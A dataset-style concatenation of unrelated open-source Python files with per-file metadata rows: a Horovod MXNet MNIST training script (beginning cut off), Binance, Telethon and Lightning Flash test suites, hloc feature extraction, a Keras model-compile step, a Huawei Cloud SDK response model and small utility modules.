        # Each rank extracts into its own directory to avoid clashes.
        data_dir = "data-%d" % rank
        if not os.path.isdir(data_dir):
            os.makedirs(data_dir)
        zip_file_path = download('http://data.mxnet.io/mxnet/data/mnist.zip',
                                 dirname=data_dir)
        with zipfile.ZipFile(zip_file_path) as zf:
            zf.extractall(data_dir)
        input_shape = (1, 28, 28)
        batch_size = args.batch_size
        # Training set is sharded across workers via num_parts/part_index.
        train_iter = mx.io.MNISTIter(
            image="%s/train-images-idx3-ubyte" % data_dir,
            label="%s/train-labels-idx1-ubyte" % data_dir,
            input_shape=input_shape,
            batch_size=batch_size,
            shuffle=True,
            flat=False,
            num_parts=hvd.size(),
            part_index=hvd.rank()
        )
        # Validation set is NOT sharded: every rank evaluates the full set.
        val_iter = mx.io.MNISTIter(
            image="%s/t10k-images-idx3-ubyte" % data_dir,
            label="%s/t10k-labels-idx1-ubyte" % data_dir,
            input_shape=input_shape,
            batch_size=batch_size,
            flat=False,
        )
        return train_iter, val_iter
    # Network hyper-parameters for the LeNet-style CNN below.
    kernel_size = 5
    strides = 2
    pool_size = 2
    hidden_dim = 512
    output_dim = 10
    activation = 'relu'
    # Function to define neural network
    def conv_nets():
        net = gluon.nn.HybridSequential()
        with net.name_scope():
            net.add(gluon.nn.Conv2D(channels=20, kernel_size=kernel_size, activation=activation))
            net.add(gluon.nn.MaxPool2D(pool_size=pool_size, strides=strides))
            net.add(gluon.nn.Conv2D(channels=50, kernel_size=kernel_size, activation=activation))
            net.add(gluon.nn.MaxPool2D(pool_size=pool_size, strides=strides))
            net.add(gluon.nn.Flatten())
            net.add(gluon.nn.Dense(hidden_dim, activation=activation))
            net.add(gluon.nn.Dense(output_dim))
        return net
    # Function to evaluate accuracy for a model
    def evaluate(model, data_iter, context):
        data_iter.reset()
        metric = mx.metric.Accuracy()
        for _, batch in enumerate(data_iter):
            data = batch.data[0].as_in_context(context)
            label = batch.label[0].as_in_context(context)
            output = model(data.astype(args.dtype, copy=False))
            metric.update([label], [output])
        return metric.get()
    # Initialize Horovod
    hvd.init()
    # Horovod: pin context to local rank
    context = mx.cpu(hvd.local_rank()) if args.no_cuda else mx.gpu(hvd.local_rank())
    num_workers = hvd.size()
    # Load training and validation data
    train_data, val_data = get_mnist_iterator(hvd.rank())
    # Build model
    model = conv_nets()
    model.cast(args.dtype)
    model.hybridize()
    # Create optimizer (learning rate scaled by world size, per Horovod convention)
    optimizer_params = {'momentum': args.momentum,
                        'learning_rate': args.lr * hvd.size()}
    opt = mx.optimizer.create('sgd', **optimizer_params)
    # Initialize parameters
    initializer = mx.init.Xavier(rnd_type='gaussian', factor_type="in",
                                 magnitude=2)
    model.initialize(initializer, ctx=context)
    # Horovod: fetch and broadcast parameters so all ranks start identical
    params = model.collect_params()
    if params is not None:
        hvd.broadcast_parameters(params, root_rank=0)
    # Horovod: create DistributedTrainer, a subclass of gluon.Trainer
    trainer = hvd.DistributedTrainer(params, opt)
    # Create loss function and train metric
    loss_fn = gluon.loss.SoftmaxCrossEntropyLoss()
    metric = mx.metric.Accuracy()
    # Global training timing (rank 0 only)
    if hvd.rank() == 0:
        global_tic = time.time()
    # Train model
    for epoch in range(args.epochs):
        tic = time.time()
        train_data.reset()
        metric.reset()
        for nbatch, batch in enumerate(train_data, start=1):
            data = batch.data[0].as_in_context(context)
            label = batch.label[0].as_in_context(context)
            with autograd.record():
                output = model(data.astype(args.dtype, copy=False))
                loss = loss_fn(output, label)
            loss.backward()
            trainer.step(args.batch_size)
            metric.update([label], [output])
            if nbatch % 100 == 0:
                name, acc = metric.get()
                logging.info('[Epoch %d Batch %d] Training: %s=%f' %
                             (epoch, nbatch, name, acc))
        if hvd.rank() == 0:
            elapsed = time.time() - tic
            speed = nbatch * args.batch_size * hvd.size() / elapsed
            logging.info('Epoch[%d]\tSpeed=%.2f samples/s\tTime cost=%f',
                         epoch, speed, elapsed)
        # Evaluate model accuracy
        _, train_acc = metric.get()
        name, val_acc = evaluate(model, val_data, context)
        if hvd.rank() == 0:
            logging.info('Epoch[%d]\tTrain: %s=%f\tValidation: %s=%f', epoch, name,
                         train_acc, name, val_acc)
        # Sanity threshold checked only after the final epoch.
        if hvd.rank() == 0 and epoch == args.epochs - 1:
            assert val_acc > 0.96, "Achieved accuracy (%f) is lower than expected\
                    (0.96)" % val_acc
    if hvd.rank()==0:
        global_training_time =time.time() - global_tic
        print("Global elpased time on training:{}".format(global_training_time))
        device = context.device_type + str(num_workers)
        logging.info('Device info: %s', device)
if __name__ == "__main__":
    # Handling script arguments
    parser = argparse.ArgumentParser(description='MXNet MNIST Distributed Example')
    parser.add_argument('--batch-size', type=int, default=64,
                        help='training batch size (default: 64)')
    parser.add_argument('--dtype', type=str, default='float32',
                        help='training data type (default: float32)')
    parser.add_argument('--epochs', type=int, default=5,
                        help='number of training epochs (default: 5)')
    parser.add_argument('--lr', type=float, default=0.01,
                        help='learning rate (default: 0.01)')
    parser.add_argument('--momentum', type=float, default=0.9,
                        help='SGD momentum (default: 0.9)')
    parser.add_argument('--no-cuda', action='store_true', help='disable training on GPU (default: False)')
    args = parser.parse_args()
    if not args.no_cuda:
        # Disable CUDA if there are no GPUs.
        if mx.context.num_gpus() == 0:
            args.no_cuda = True
    logging.basicConfig(level=logging.INFO)
    logging.info(args)
    main()
| test/sagemaker_tests/mxnet/training/resources/mnist/horovod_mnist.py | 7,357 | Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.:wq Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the License. A copy of the License is located at http://aws.amazon.com/apache2.0/ or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Function to get mnist iterator given a rank Function to define neural network Function to evaluate accuracy for a model Initialize Horovod Horovod: pin context to local rank Load training and validation data Build model Create optimizer Initialize parameters Horovod: fetch and broadcast parameters Horovod: create DistributedTrainer, a subclass of gluon.Trainer Create loss function and train metric Global training timing Train model Evaluate model accuracy Handling script arguments Disable CUDA if there are no GPUs. | 1,069 | en | 0.745968 |
import responses
from urllib.parse import urlencode
from tests.util import random_str
from tests.util import mock_http_response
from binance.spot import Spot as Client
from binance.error import ParameterRequiredError
# Shared fixtures for the tests below: a canned HTTP payload, random API
# credentials, and the request parameters sent to the margin-asset endpoint.
mock_item = {"key_1": "value_1", "key_2": "value_2"}
key = random_str()
secret = random_str()
asset = "BNB"
amount = "100"
params = {"asset": asset}
def test_margin_asset_without_asset():
    """Tests the API endpoint to margin asset without asset"""
    # An empty asset string must be rejected client-side, before any request.
    Client(key, secret).margin_asset.when.called_with("").should.throw(
        ParameterRequiredError
    )
@mock_http_response(
    responses.GET, "/sapi/v1/margin/asset\\?" + urlencode(params), mock_item, 200
)
def test_margin_asset():
    """Tests the API endpoint to margin asset"""
    # The mocked endpoint must echo mock_item back unchanged.
    api = Client(key, secret)
    api.margin_asset(**params).should.equal(mock_item)
| tests/spot/margin/test_margin_asset.py | 888 | Tests the API endpoint to margin asset
Tests the API endpoint to margin asset without asset | 91 | en | 0.638188 |
from collections import defaultdict
class RunningAverage:
    """
    Computes exponential moving averages.
    """

    def __init__(self, mix_rate: float = 0.95):
        # Weight kept by the previous average; (1 - mix_rate) goes to the new value.
        self.mix_rate = mix_rate
        # Maps name -> current average; missing names read as None.
        self.avgs = defaultdict(lambda: None)

    def record(self, name: str, value: float, ignore_nan: bool = True):
        """
        Update the running average for ``name`` with ``value``.

        Args:
            name: name of value.
            value: value to record.
            ignore_nan: skip NaN/None values and do not record them (they would
                poison the averages).

        Returns:
            The current running average for ``name`` (unchanged if the value
            was skipped; ``None`` if nothing has been recorded yet).
        """
        # Check for None before the NaN self-inequality test; NaN is the only
        # float that is not equal to itself.
        if ignore_nan and (value is None or value != value):
            return self.avgs[name]
        if self.avgs.get(name) is None:
            # First observation seeds the average.
            self.avgs[name] = value
        else:
            self.avgs[name] = self.mix_rate * self.avgs[name] + (1 - self.mix_rate) * value
        return self.avgs[name]
| wrangl/metrics/running_avg.py | 833 | Computes exponential moving averages averages.
Args:
name: name of value.
value: value to record.
ignore_nan: ignore nan values and do not record them (they will mess up the averages). | 196 | en | 0.710018 |
import argparse
import torch
from pathlib import Path
import h5py
import logging
from types import SimpleNamespace
import cv2
import numpy as np
from tqdm import tqdm
import pprint
from . import extractors
from .utils.base_model import dynamic_load
from .utils.tools import map_tensor
'''
A set of standard configurations that can be directly selected from the command
line using their name. Each is a dictionary with the following entries:
- output: the name of the feature file that will be generated.
- model: the model configuration, as passed to a feature extractor.
- preprocessing: how to preprocess the images read from disk.
'''
# Named presets selectable from the command line (choices come from this dict's
# keys in the __main__ block below).
confs = {
    # SuperPoint, up to 4096 keypoints, inputs resized to at most 1024 px
    # (Aachen setting).
    'superpoint_aachen': {
        'output': 'feats-superpoint-n4096-r1024',
        'model': {
            'name': 'superpoint',
            'nms_radius': 3,
            'max_keypoints': 4096,
        },
        'preprocessing': {
            'grayscale': True,
            'resize_max': 1024,
        },
    },
    # SuperPoint with a wider NMS radius and larger input size (InLoc setting).
    'superpoint_inloc': {
        'output': 'feats-superpoint-n4096-r1600',
        'model': {
            'name': 'superpoint',
            'nms_radius': 4,
            'max_keypoints': 4096,
        },
        'preprocessing': {
            'grayscale': True,
            'resize_max': 1600,
        },
    },
    # Same parameters as 'superpoint_inloc' but with a generic output name.
    'hfnet_superpoint': {
        'output': 'feats-superpoint',
        'model': {
            'name': 'superpoint',
            'nms_radius': 4,
            'max_keypoints': 4096,
        },
        'preprocessing': {
            'grayscale': True,
            'resize_max': 1600,
        },
    },
    # D2-Net, single-scale, color input.
    'd2net-ss': {
        'output': 'feats-d2net-ss',
        'model': {
            'name': 'd2net',
            'multiscale': False,
        },
        'preprocessing': {
            'grayscale': False,
            'resize_max': 1600,
        },
    },
}
class ImageDataset(torch.utils.data.Dataset):
    """Lists all images under a root directory and yields them preprocessed
    (optionally grayscale, resized, normalized to [0, 1], CxHxW)."""

    default_conf = {
        'globs': ['*.jpg', '*.png', '*.jpeg', '*.JPG', '*.PNG'],
        'grayscale': False,
        'resize_max': None,
    }

    def __init__(self, root, conf):
        # Overlay the user-provided conf on top of the defaults.
        self.conf = conf = SimpleNamespace(**{**self.default_conf, **conf})
        self.root = root

        self.paths = []
        for g in conf.globs:
            self.paths += list(Path(root).glob('**/'+g))
        if len(self.paths) == 0:
            raise ValueError(f'Could not find any image in root: {root}.')
        # De-duplicate (a file may match several globs) and sort for determinism.
        self.paths = sorted(list(set(self.paths)))
        self.paths = [i.relative_to(root) for i in self.paths]
        logging.info(f'Found {len(self.paths)} images in root {root}.')

    def __getitem__(self, idx):
        path = self.paths[idx]
        if self.conf.grayscale:
            mode = cv2.IMREAD_GRAYSCALE
        else:
            mode = cv2.IMREAD_COLOR
        image = cv2.imread(str(self.root / path), mode)
        # BUG FIX: cv2.imread returns None on failure. The original flipped the
        # channels BEFORE this check, so a bad file crashed with a TypeError
        # instead of raising this explicit error.
        if image is None:
            raise ValueError(f'Cannot read image {str(path)}.')
        if not self.conf.grayscale:
            image = image[:, :, ::-1]  # BGR to RGB
        image = image.astype(np.float32)
        size = image.shape[:2][::-1]
        w, h = size

        if self.conf.resize_max and max(w, h) > self.conf.resize_max:
            scale = self.conf.resize_max / max(h, w)
            h_new, w_new = int(round(h*scale)), int(round(w*scale))
            image = cv2.resize(
                image, (w_new, h_new), interpolation=cv2.INTER_LINEAR)

        if self.conf.grayscale:
            image = image[None]  # add a channel dimension: 1xHxW
        else:
            image = image.transpose((2, 0, 1))  # HxWxC to CxHxW
        image = image / 255.

        data = {
            'name': path.as_posix(),
            'image': image,
            # Pre-resize (width, height), used later to rescale keypoints.
            'original_size': np.array(size),
        }
        return data

    def __len__(self):
        return len(self.paths)
class FeatureExtractor(object):
    """Standalone wrapper that runs a feature-extraction model on a single
    in-memory image (HxWxC, RGB), mirroring the preprocessing done in main()."""

    def __init__(self, conf):
        self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
        Model = dynamic_load(extractors, conf['model']['name'])
        self.model = Model(conf['model']).eval().to(self.device)

    def extract(self, image):
        """Extract features for one image array; returns the prediction dict
        with keypoints mapped back to the original image resolution."""
        image = image.astype(np.float32)
        size = image.shape[:2][::-1]
        image = image.transpose((2, 0, 1))  # HxWxC to CxHxW
        image = image / 255.

        # Mimic the DataLoader collation used in main(): wrap in tensors and
        # add a batch dimension so the `[0]` indexing and `.numpy()` calls
        # below are valid.
        data = {
            'image': torch.from_numpy(image)[None],
            'original_size': torch.from_numpy(np.array(size))[None],
        }

        # BUG FIX: the original referenced an undefined global `model`; use
        # the model owned by this instance.
        pred = self.model(map_tensor(data, lambda x: x.to(self.device)))
        pred = {k: v[0].cpu().numpy() for k, v in pred.items()}

        pred['image_size'] = original_size = data['original_size'][0].numpy()
        if 'keypoints' in pred:
            size = np.array(data['image'].shape[-2:][::-1])
            scales = (original_size / size).astype(np.float32)
            # Convert keypoint coordinates back to the original resolution.
            pred['keypoints'] = (pred['keypoints'] + .5) * scales[None] - .5

        return pred
@torch.no_grad()
def main(conf, image_dir, export_dir, as_half=False):
    """Extract local features for every image under `image_dir` and export
    them to an HDF5 file in `export_dir`.

    Args:
        conf: one of the `confs` presets (model + preprocessing + output name).
        image_dir: root directory containing the images.
        export_dir: directory where the feature file is written.
        as_half: store float32 arrays as float16 to halve file size.
    """
    logging.info('Extracting local features with configuration:'
                 f'\n{pprint.pformat(conf)}')

    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    Model = dynamic_load(extractors, conf['model']['name'])
    model = Model(conf['model']).eval().to(device)

    loader = ImageDataset(image_dir, conf['preprocessing'])
    loader = torch.utils.data.DataLoader(loader, num_workers=1)

    feature_path = Path(export_dir, conf['output']+'.h5')
    feature_path.parent.mkdir(exist_ok=True, parents=True)
    # Context manager guarantees the HDF5 file is closed even if extraction
    # fails part-way (the original leaked the handle on any exception).
    with h5py.File(str(feature_path), 'a') as feature_file:
        for data in tqdm(loader):
            pred = model(map_tensor(data, lambda x: x.to(device)))
            pred = {k: v[0].cpu().numpy() for k, v in pred.items()}

            pred['image_size'] = original_size = data['original_size'][0].numpy()
            if 'keypoints' in pred:
                size = np.array(data['image'].shape[-2:][::-1])
                scales = (original_size / size).astype(np.float32)
                # Map keypoints back to the pre-resize image resolution.
                pred['keypoints'] = (pred['keypoints'] + .5) * scales[None] - .5

            if as_half:
                for k in pred:
                    # The original also tested `dt != np.float16`, which is
                    # always true when dt == np.float32; simplified.
                    if pred[k].dtype == np.float32:
                        pred[k] = pred[k].astype(np.float16)

            grp = feature_file.create_group(data['name'][0])
            for k, v in pred.items():
                grp.create_dataset(k, data=v)

            del pred

    logging.info('Finished exporting features.')
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--image_dir', type=Path, required=True)
    parser.add_argument('--export_dir', type=Path, required=True)
    parser.add_argument('--conf', type=str, default='superpoint_aachen',
                        choices=list(confs.keys()))
    # Expose main()'s as_half option; it was previously unreachable from the CLI.
    parser.add_argument('--as_half', action='store_true',
                        help='store float32 features as float16')
    args = parser.parse_args()
    main(confs[args.conf], args.image_dir, args.export_dir, as_half=args.as_half)
| hloc/extract_features.py | 6,772 | BGR to RGB HxWxC to CxHxW HxWxC to CxHxW | 40 | en | 0.505052 |
class TokenNotFound(Exception):
    """Raised when a token could not be found in the database."""
import os
import unittest
from telethon.tl import TLObject
from telethon.extensions import BinaryReader
class UtilsTests(unittest.TestCase):
    """Round-trip tests for Telethon's binary reader/serialization helpers."""

    @staticmethod
    def test_binary_writer_reader():
        # Test that we can read properly
        # The blob encodes, in order: byte 1, int 5, long 13, float 17.0,
        # double 25.0, the 7 raw bytes 26..32, and an unsigned 128-bit
        # integer equal to 2**127.
        data = b'\x01\x05\x00\x00\x00\r\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
               b'\x88A\x00\x00\x00\x00\x00\x009@\x1a\x1b\x1c\x1d\x1e\x1f ' \
               b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
               b'\x00\x80'

        with BinaryReader(data) as reader:
            value = reader.read_byte()
            assert value == 1, 'Example byte should be 1 but is {}'.format(value)

            value = reader.read_int()
            assert value == 5, 'Example integer should be 5 but is {}'.format(value)

            value = reader.read_long()
            assert value == 13, 'Example long integer should be 13 but is {}'.format(value)

            value = reader.read_float()
            assert value == 17.0, 'Example float should be 17.0 but is {}'.format(value)

            value = reader.read_double()
            assert value == 25.0, 'Example double should be 25.0 but is {}'.format(value)

            value = reader.read(7)
            assert value == bytes([26, 27, 28, 29, 30, 31, 32]), 'Example bytes should be {} but is {}' \
                .format(bytes([26, 27, 28, 29, 30, 31, 32]), value)

            value = reader.read_large_int(128, signed=False)
            assert value == 2**127, 'Example large integer should be {} but is {}'.format(2**127, value)

    @staticmethod
    def test_binary_tgwriter_tgreader():
        # Telegram-style (TL) byte strings are length-prefixed and padded to a
        # multiple of 4; exercise both short and long length encodings.
        small_data = os.urandom(33)
        small_data_padded = os.urandom(19)  # +1 byte for length = 20 (%4 = 0)

        large_data = os.urandom(999)
        large_data_padded = os.urandom(1024)

        data = (small_data, small_data_padded, large_data, large_data_padded)
        string = 'Testing Telegram strings, this should work properly!'
        serialized = b''.join(TLObject.serialize_bytes(d) for d in data) + \
            TLObject.serialize_bytes(string)

        with BinaryReader(serialized) as reader:
            # And then try reading it without errors (it should be unharmed!)
            for datum in data:
                value = reader.tgread_bytes()
                assert value == datum, 'Example bytes should be {} but is {}'.format(
                    datum, value)

            value = reader.tgread_string()
            assert value == string, 'Example string should be {} but is {}'.format(
                string, value)
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
from typing import Tuple
from unittest import mock
import numpy as np
import pytest
import torch
from flash import Trainer
from flash.__main__ import main
from flash.core.data.data_pipeline import DataPipeline
from flash.core.data.data_source import DefaultDataKeys
from flash.core.utilities.imports import _IMAGE_AVAILABLE
from flash.image import SemanticSegmentation
from flash.image.segmentation.data import SemanticSegmentationPreprocess
from tests.helpers.utils import _IMAGE_TESTING, _SERVE_TESTING
# ======== Mock functions ========
class DummyDataset(torch.utils.data.Dataset):
    """Synthetic segmentation dataset: random images paired with random masks."""

    size: Tuple[int, int] = (224, 224)
    num_classes: int = 8

    def __getitem__(self, index):
        image = torch.rand(3, *self.size)
        target = torch.randint(self.num_classes - 1, self.size)
        return {DefaultDataKeys.INPUT: image, DefaultDataKeys.TARGET: target}

    def __len__(self) -> int:
        return 10
# ==============================
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_smoke():
    """The task can be instantiated at all."""
    assert SemanticSegmentation(num_classes=1) is not None
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
@pytest.mark.parametrize("num_classes", [8, 256])
@pytest.mark.parametrize("img_shape", [(1, 3, 224, 192), (2, 3, 128, 256)])
def test_forward(num_classes, img_shape):
    """A forward pass keeps batch/spatial dims and emits num_classes channels."""
    model = SemanticSegmentation(
        num_classes=num_classes,
        backbone="resnet50",
        head="fpn",
    )
    batch, _, height, width = img_shape
    prediction = model(torch.rand(*img_shape))
    assert prediction.shape == (batch, num_classes, height, width)
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_init_train(tmpdir):
    """One fast-dev-run finetuning step completes without error."""
    trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
    trainer.finetune(
        SemanticSegmentation(num_classes=10),
        torch.utils.data.DataLoader(DummyDataset()),
        strategy="freeze_unfreeze",
    )
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_non_existent_backbone():
    """An unknown backbone name raises KeyError from the backbone registry."""
    with pytest.raises(KeyError):
        SemanticSegmentation(2, "i am never going to implement this lol")
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_freeze():
    """freeze() disables gradients on every backbone parameter."""
    model = SemanticSegmentation(2)
    model.freeze()
    assert all(not param.requires_grad for param in model.backbone.parameters())
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_unfreeze():
    """unfreeze() re-enables gradients on every backbone parameter."""
    model = SemanticSegmentation(2)
    model.unfreeze()
    assert all(param.requires_grad for param in model.backbone.parameters())
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_predict_tensor():
    """predict() on a raw tensor yields a 64x64 nested list of labels."""
    model = SemanticSegmentation(2, backbone="mobilenetv3_large_100")
    pipeline = DataPipeline(preprocess=SemanticSegmentationPreprocess(num_classes=1))
    prediction = model.predict(
        torch.rand(1, 3, 64, 64), data_source="tensors", data_pipeline=pipeline
    )
    assert isinstance(prediction[0], list)
    assert len(prediction[0]) == 64
    assert len(prediction[0][0]) == 64
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_predict_numpy():
    """predict() on a numpy array yields a 64x64 nested list of labels."""
    model = SemanticSegmentation(2, backbone="mobilenetv3_large_100")
    pipeline = DataPipeline(preprocess=SemanticSegmentationPreprocess(num_classes=1))
    prediction = model.predict(
        np.ones((1, 3, 64, 64)), data_source="numpy", data_pipeline=pipeline
    )
    assert isinstance(prediction[0], list)
    assert len(prediction[0]) == 64
    assert len(prediction[0][0]) == 64
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
@pytest.mark.parametrize("jitter, args", [(torch.jit.trace, (torch.rand(1, 3, 32, 32),))])
def test_jit(tmpdir, jitter, args):
    """A traced model survives a save/load round trip and still runs."""
    traced = jitter(SemanticSegmentation(2).eval(), *args)

    path = os.path.join(tmpdir, "test.pt")
    torch.jit.save(traced, path)
    reloaded = torch.jit.load(path)

    out = reloaded(torch.rand(1, 3, 32, 32))
    assert isinstance(out, torch.Tensor)
    assert out.shape == torch.Size([1, 2, 32, 32])
@pytest.mark.skipif(not _SERVE_TESTING, reason="serve libraries aren't installed.")
@mock.patch("flash._IS_TESTING", True)
def test_serve():
    """serve() starts (in testing mode) once a preprocess is attached."""
    model = SemanticSegmentation(2)
    # TODO: Currently only servable once a preprocess has been attached
    model._preprocess = SemanticSegmentationPreprocess()
    model.eval()
    model.serve()
@pytest.mark.skipif(_IMAGE_AVAILABLE, reason="image libraries are installed.")
def test_load_from_checkpoint_dependency_error():
    """Without the image extra installed, loading points at the missing extra."""
    with pytest.raises(ModuleNotFoundError, match=re.escape("'lightning-flash[image]'")):
        SemanticSegmentation.load_from_checkpoint("not_a_real_checkpoint.pt")
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_available_pretrained_weights():
    """The resnet18 backbone advertises its known pretrained weight sets."""
    assert SemanticSegmentation.available_pretrained_weights("resnet18") == ["imagenet", "ssl", "swsl"]
@pytest.mark.skipif(not _IMAGE_TESTING, reason="image libraries aren't installed.")
def test_cli():
    """The CLI entry point runs a fast_dev_run without crashing."""
    cli_args = ["flash", "semantic-segmentation", "--trainer.fast_dev_run", "True"]
    with mock.patch("sys.argv", cli_args):
        try:
            main()
        except SystemExit:
            # argparse/LightningCLI may exit normally; only real errors should fail.
            pass
| tests/image/segmentation/test_model.py | 5,987 | Copyright The PyTorch Lightning team. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ======== Mock functions ======== ============================== TODO: Currently only servable once a preprocess has been attached | 689 | en | 0.865187 |
from engine.steps.IStep import IStep
from keras.models import Model
from keras import backend as K
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
class config_model(IStep):
    """Pipeline step that compiles the Keras model found in the output channel.

    The optimizer and loss are produced by factory callables that receive the
    step instance (so they can read epochs / learning_ratio / batch_size).
    """
    create_Optimizer_func = None
    create_loss_func = None

    def __init__(self, output_channel, name, create_Optimizer_func, create_loss_func):
        # BUG FIX: `super().__init__` already binds `self`; the original passed
        # `self` again, shifting every argument by one.
        # NOTE(review): assumes IStep.__init__(output_channel, name) -- confirm
        # against the IStep base class.
        super().__init__(output_channel, name)
        self.create_Optimizer_func = create_Optimizer_func
        self.create_loss_func = create_loss_func

    def IRun(self):
        if self.create_Optimizer_func is None:
            raise Exception("No create optimizer function!")
        if self.create_loss_func is None:
            self.create_loss_func = self._default_categorical_crossentropy
        try:
            opt = self.create_Optimizer_func(self)
            loss = self.create_loss_func(self)
            model = self.output_channel['model']
            # if self.train_only_top_layer:
            #     for layer in base_model.layers:
            #         layer.trainable = False
            model.compile(optimizer=opt, loss=loss, metrics=[self.metrics])
        except Exception as e:
            # BUG FIX: `Exception` has no `.message` attribute in Python 3.
            self.output_channel['Error'] = "fatal error occur: " + str(e)
            self.output_channel['ErrorType'] = "fatal"

    def IParseConfig(self, config_json):
        """Read epochs / learning_ratio / batch_size / metrics from the config."""
        self.epochs = config_json['epochs']
        self.learning_ratio = config_json['learning_ratio']
        self.batch_size = config_json['batch_size']
        self.metrics = config_json['metrics']

        self.output_channel['epochs'] = self.epochs
        self.output_channel['learning_ratio'] = self.learning_ratio
        self.output_channel['batch_size'] = self.batch_size

    def IDispose(self):
        pass

    @staticmethod
    def _default_categorical_crossentropy(step=None):
        # BUG FIX: this fallback is invoked as `self.create_loss_func(self)`.
        # The original zero-argument instance method raised a TypeError when
        # called that way; a staticmethod taking the step works both for the
        # default and for externally supplied factories.
        return "categorical_crossentropy"
class config_model_adam_categorical_crossentropy(config_model):
    """ config model: optimizer=Adam, loss = 'categorical_crossentropy' """

    def __init__(self, output_channel, name=None):
        # BUG FIX: the original passed `self` explicitly through `super()`,
        # handing config_model.__init__ six arguments instead of five
        # (TypeError). Pass the factories as plain (unbound) functions so that
        # `self.create_Optimizer_func(self)` in IRun supplies their single
        # argument exactly once.
        super().__init__(
            output_channel,
            name,
            config_model_adam_categorical_crossentropy.create_Adam,
            config_model_adam_categorical_crossentropy.create_loss,
        )

    def create_Adam(self):
        """Adam optimizer with time-based learning-rate decay."""
        return Adam(lr=self.learning_ratio, decay=self.learning_ratio / self.epochs)

    def create_loss(self):
        """ create loss function """
        return "categorical_crossentropy"
| source/engine/steps/config_model.py | 2,496 | config model
config model: optimizer=Adam, loss = 'categorical_crossentropy'
create loss function | 98 | en | 0.314298 |
# coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ShowDomainQuotaResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'quotas': 'QuotaResult'
}
attribute_map = {
'quotas': 'quotas'
}
def __init__(self, quotas=None):
"""ShowDomainQuotaResponse - a model defined in huaweicloud sdk"""
super(ShowDomainQuotaResponse, self).__init__()
self._quotas = None
self.discriminator = None
if quotas is not None:
self.quotas = quotas
@property
def quotas(self):
"""Gets the quotas of this ShowDomainQuotaResponse.
:return: The quotas of this ShowDomainQuotaResponse.
:rtype: QuotaResult
"""
return self._quotas
@quotas.setter
def quotas(self, quotas):
"""Sets the quotas of this ShowDomainQuotaResponse.
:param quotas: The quotas of this ShowDomainQuotaResponse.
:type: QuotaResult
"""
self._quotas = quotas
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowDomainQuotaResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| huaweicloud-sdk-iam/huaweicloudsdkiam/v3/model/show_domain_quota_response.py | 3,079 | Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
Returns true if both objects are equal
ShowDomainQuotaResponse - a model defined in huaweicloud sdk
Returns true if both objects are not equal
For `print`
Gets the quotas of this ShowDomainQuotaResponse.
:return: The quotas of this ShowDomainQuotaResponse.
:rtype: QuotaResult
Sets the quotas of this ShowDomainQuotaResponse.
:param quotas: The quotas of this ShowDomainQuotaResponse.
:type: QuotaResult
Returns the model properties as a dict
Returns the string representation of the model
coding: utf-8 | 743 | en | 0.579125 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010-2016 PPMessage.
# Guijin Ding, dingguijin@gmail.com
#
#
from .basehandler import BaseHandler
